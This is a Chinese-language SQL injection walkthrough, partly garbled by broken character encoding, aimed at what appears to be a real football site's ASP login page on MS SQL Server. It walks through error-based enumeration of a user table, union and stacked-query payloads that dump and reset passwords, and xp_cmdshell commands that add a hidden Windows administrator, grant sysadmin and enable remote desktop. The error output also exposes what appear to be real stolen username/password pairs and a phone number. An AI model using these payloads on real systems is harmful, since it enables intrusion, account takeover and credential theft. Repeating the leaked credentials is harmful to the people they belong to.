一�、獲得建立用戶的表的名字和字段的名字�����;使用select語(yǔ)法的having子句��。
**********************************************************************************
''having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_id'' 在選擇列表中無(wú)效���,因?yàn)樵摿形窗诰酆虾瘮?shù)中,并且沒(méi)有 GROUP BY 子句��。
/football/reguser/check.asp,行26
成果:知道了表的名字reguser和第一個(gè)字段的名字reguser.reg_id���。
二����、通過(guò)字段放到group by子句找到字段名�����。
1����、
**********************************************************************************
''group by reguser.reg_id having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_name'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中��,也不包含在 GROUP BY 子句中����。
/football/reguser/check.asp,行26
成果:得到了reguser.reg_name字段
2���、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_password'' 在選擇列表中無(wú)效�,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp�,行26
成果:得到了reguser.reg_password字段
3����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_relname'' 在選擇列表中無(wú)效��,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中�����,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp��,行26
成果:得到了reguser.reg_relname字段
4�、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_regtime'' 在選擇列表中無(wú)效�,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中,也不包含在 GROUP BY 子句中�。
/football/reguser/check.asp,行26
成果:得到了reguser.reg_regtime字段
5��、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_findme'' 在選擇列表中無(wú)效����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中���,也不包含在 GROUP BY 子句中。
/football/reguser/check.asp�����,行26
成果:得到了reguser.reg_findme字段
6���、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_city'' 在選擇列表中無(wú)效����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中����,也不包含在 GROUP BY 子句中。
/football/reguser/check.asp���,行26
成果:得到了reguser.reg_city字段
7����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_qq'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中���,也不包含在 GROUP BY 子句中����。
/football/reguser/check.asp�����,行26
成果:得到了reguser.reg_qq字段
8�、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_icq'' 在選擇列表中無(wú)效����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp�����,行26
成果:得到了reguser.reg_icq字段9��、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_msn'' 在選擇列表中無(wú)效�,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中,也不包含在 GROUP BY 子句中�。
/football/reguser/check.asp,行26
成果:得到了reguser.reg_msn字段
10����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_phone'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中��,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp���,行26
成果:得到了reguser.reg_phone字段
11、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_class'' 在選擇列表中無(wú)效�����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中����,也不包含在 GROUP BY 子句中。
/football/reguser/check.asp����,行26
成果:得到了reguser.reg_class字段
12�����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_money'' 在選擇列表中無(wú)效��,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中���,也不包含在 GROUP BY 子句中。
/football/reguser/check.asp���,行26
成果:得到了reguser.reg_money字段
13����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_regip'' 在選擇列表中無(wú)效��,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中����,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp�����,行26
成果:得到了reguser.reg_regip字段
14�����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_Estar'' 在選擇列表中無(wú)效����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中,也不包含在 GROUP BY 子句中����。
/football/reguser/check.asp,行26
成果:得到了reguser.reg_Estar字段
15��、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_Eend'' 在選擇列表中無(wú)效���,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中����,也不包含在 GROUP BY 子句中�����。
/football/reguser/check.asp����,行26
成果:得到了reguser.reg_Eend字段
16�����、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar,reguser.reg_Eend having 1=1--返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_changeuser'' 在選擇列表中無(wú)效�����,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中����,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp�����,行26
成果:得到了reguser.reg_changeuser字段
17��、
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar,reguser.reg_Eend,reguser.reg_changeuser having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_changetime'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中��,也不包含在 GROUP BY 子句中���。
/football/reguser/check.asp�,行26
成果:得到了reguser.reg_changetime字段
18
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar,reguser.reg_Eend,reguser.reg_changeuser,reguser.reg_changetime having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_logintime'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中��,也不包含在 GROUP BY 子句中�����。
/football/reguser/check.asp�,行26
成果:得到了reguser.reg_logintime字段
19
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar,reguser.reg_Eend,reguser.reg_changeuser,reguser.reg_changetime,reguser.reg_logintime having 1=1--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
列 ''reguser.reg_online'' 在選擇列表中無(wú)效,因?yàn)樵摿屑炔话诰酆虾瘮?shù)中���,也不包含在 GROUP BY 子句中����。
/football/reguser/check.asp����,行26
成果:得到了reguser.reg_online字段
20
**********************************************************************************
''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class,reguser.reg_money,reguser.reg_regip,reguser.reg_Estar,reguser.reg_Eend,reguser.reg_changeuser,reguser.reg_changetime,reguser.reg_logintime,reguser.reg_online having 1=1--
**********************************************************************************
返回結(jié)果:
出現(xiàn)信息提示框;你還不是會(huì)員請(qǐng)注冊(cè)
到這里一個(gè)表猜完���。
三����、確定列的類型。通過(guò)使用類型轉(zhuǎn)化來(lái)實(shí)現(xiàn):利用了SQLSERVER在確定兩個(gè)結(jié)果集的字段是否相等前應(yīng)用sum子句�����。
1��、
**********************************************************************************
''union select sum(reguser.reg_name) from reguser--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e07''
sum or average aggregate 運(yùn)算不能以 varchar 數(shù)據(jù)類型作為參數(shù)��。
/football/reguser/check.asp�����,行26
成果:reguser.reg_name字段是數(shù)據(jù)類型varchar����。
2、
**********************************************************************************
''union select sum(reguser.reg_id) from reguser--
**********************************************************************************
返回結(jié)果:
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e14''
包含 UNION 運(yùn)算符的 SQL 語(yǔ)句中的所有查詢都必須在目標(biāo)列表中具有相同數(shù)目的表達(dá)式�。
/football/reguser/check.asp,行26
四�、insert查詢:
**********************************************************************************
'';insert into reguser values(666,''attacker'',''foobar'')--
**********************************************************************************
五、
''union select * from reguser where reguser.reg_name=''admin''--
'';select * from reguser where reguser.reg_name=''admin''--
'';updata reguser set reguser.reg_password=''36d201fb337dc23bde4d143491cfae4d'' where reguser.reg_name=''admin''--
''union updata reguser set reguser.reg_password=''36d201fb337dc23bde4d143491cfae4d'' where reguser.reg_name=''admin''--
六�����、從reguser表中讀取用戶名:
''union select min(reguser.reg_name),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from reguser where reguser.reg_name>''a''--
這句選擇users表中username大于''a''中的最小值����,并試圖把它轉(zhuǎn)化成一個(gè)整型數(shù)字:
收集密碼:
''union select reguser.reg_password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from reguser where reguser.reg_name>''admin''--
''union select password,1,1,1 from users where username=''admin''--
13535701998
創(chuàng)建了一個(gè)foo表,里面只有一個(gè)單獨(dú)的列''ret''��,里面存放著得到的用戶名和密碼的字符串
'';begin declare @ret varchar(8000) set @ret='':'' select @ret=@ret+'' ''+reguser.reg_name+''/''+reguser.reg_password from reguser where reguser.reg_name>@ret select @ret as 1866574 into 1866574 end--
''union select ret,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from foo--
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 ''80040e07''
將 varchar 值 '': 383838/989898 123456/234567 korea007/154085 風(fēng)681168/13535701998 kyo327/woaini denglong/247986965'' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤�。
/football/reguser/check.asp,行26
'';drop table foo--
admin'';declare @o int,@ret int exec sp_oacreate ''speech.voicetext'',@o out exec sp_oamethod @o,''register'',NULL,''foo'',''bar'' exec sp_oasetproperty @o,''speed'',150 exec sp_oamethod @o,''speak'',NULL,''all your sequel servers are belong to us'',528 waitfor delay ''00:00:05''--
=-= 加賬號(hào) =-=
'';Exec master..xp_cmdshell ''net user''--
'';Exec master..xp_cmdshell ''net user jiaoniang$ 1866574 /add''--
'';Exec master..xp_cmdshell ''net localGroup Administrators jiaoniang$ /add''--
'';exec master..sp_addlogin jiaoniang$,1866574--
'';exec master..sp_addsrvrolemember jiaoniang$,sysadmin--
'';exec xp_regread HKEY_LOCAL_MACHINE,''SYSTEM\CurrentControlSet\Services\lanmanserver\parameters'',''nullsessionshares''--
=-= 開服務(wù) =-=
'';Exec master..xp_cmdshell ''net stat telnet''--
'';Exec master..xp_cmdshell ''net stat server''--
=-= 開3389 =-=
'';Exec master..xp_cmdshell "echo [Components] > c:\1866574"--
//在c盤根目錄建寫入一個(gè)文件
'';Exec master..xp_cmdshell "echo TsEnable = on >> c:\1866574"--
//追加寫入
'';Exec master..xp_cmdshell "sysocmgr /i:c:\windows\inf\sysoc.inf /u:c:\1866574 /q"--
//開3389�����,成功的話過(guò)會(huì)肉機(jī)會(huì)重啟?��?!
|
